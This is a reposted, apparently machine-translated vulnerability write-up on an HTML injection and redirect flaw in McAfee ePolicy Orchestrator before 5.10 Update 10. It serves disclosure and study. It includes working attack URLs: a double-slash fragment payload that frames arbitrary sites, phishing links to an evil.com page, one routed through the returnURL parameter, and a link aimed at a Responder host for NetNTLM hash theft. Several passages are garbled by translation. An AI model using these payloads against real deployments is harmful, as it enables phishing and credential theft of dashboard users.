Shulou(Shulou.com)05/31 Report--

This article will explain in detail the example analysis of HTML injection vulnerabilities in McAfee ePolicy Orchestrator. The editor thinks it is very practical, so I share it with you for reference. I hope you can get something after reading this article.

Overview of vulnerabilities

An unauthenticated client-side URL redirect vulnerability has been exposed in McAfee ePolicy Orchestrator (ePO) products earlier than 5.10 Update 10, which could cause authenticated ePO users to load untrusted sites in ePO IFRAME, allowing attackers to steal sensitive information about authenticated users. This will require the attacker to find a way to induce the ePO user to click on the malicious link while logging in to the ePO server using the browser when the target user clicks the malicious link.

Loophole analysis

In internal security assessment activities, my task is generally to test critical corporate infrastructure and software. This time, our team's task is to test the McAfee ePolicy Orchestrator products used by our company and related deployments.

During the evaluation process, I noticed that the product used a lot of postMessage and Websockets, but one of them got our idea: the URL construct in the address bar.

The following is the regular IP/URL structure in the browser address bar when we access the McAfee ePolicy Orchestrator dashboard:

Https://epo-host:8443/core/orionNavigationLogin.do#/core/orionDefaultPage.do

The / core/orionDefaultPage.do section is actually a HTTP node, which, like other HTTP nodes, is presented to the user in an IFRAME under the "top dashboard control bar", but it is also presented to other IFRAME species.

After noticing this, the first thing I tried was to inject a simple cross-site script Payload and look at the result:

Https://epo-host:8443/core/orionNavigationLogin.do#//_javascript:alert(1))

However, the Web application will correctly filter out our Payload, as well as other Payload I'm trying to inject.

So I was going to examine the JavaScript code used to perform data filtering, and I found the following:

Https://epo-host:8443/core/orionNavigationLogin.do#//google.com

The dashboard will now display the Google search page in an IFRAME under the top dashboard control bar. By using this simple double slash Payload, an attacker will be able to inject any website into the dashboard. Given the way the dashboard presents data to users, attackers can perform not only phishing attacks with high success rates, but also NetNTLM hash disclosure attacks.

Phishing attack scene

The following is the general IP/URL structure of McAfee ePolicy Orchestrator:

Https://epo-host:8443/core/orionNavigationLogin.do#/core/orionDefaultPage.do

An attacker only needs to replace the content after (#) with a malicious URL/ domain name and send URL to a user with dashboard access:

Https://epo-host:8443/core/orionNavigationLogin.do#//evil.com/phish-page.php

It should be noted here that pages hosted by malicious domain names cannot set X-Frame-Options to "DENY" or "SAMEORIGIN" to ensure that the domain name is correctly loaded in the dashboard IFRAME. However, malicious sites are controlled by attackers, which is obviously not a problem.

For more practical phishing attacks, you can use the dashboard authorization node and its GET parameter returnURL to construct a more reliable URL:

Https://epo-host:8443/SoftwareMgmt/enterLicenseKey.do?returnURL=%2f..%2fcore%2forionNavigationLogin.do%23%2f%2fevil.com%2fphish-page.php

The above connection navigates the user to the license key settings page in the dashboard, and after the user performs any action (save or cancel), he will be redirected to the phishing page:

Https://epo-host:8443/core/orionNavigationLogin.do#//evil.com/phish-page.phpePO user NetNTLM Hash leakage scenario

An attacker can also design a malicious link, point it to a host running Responder or Inveigh, and send it to a user with dashboard access to perform a NetNTLM hash disclosure attack:

This is the end of https://epo-host:8443/core/orionNavigationLogin.do#//host-running-responder-or-inveigh 's article on "sample Analysis of HTML injection vulnerabilities in McAfee ePolicy Orchestrator". I hope the above content can be helpful to you, so that you can learn more knowledge. if you think the article is good, please share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.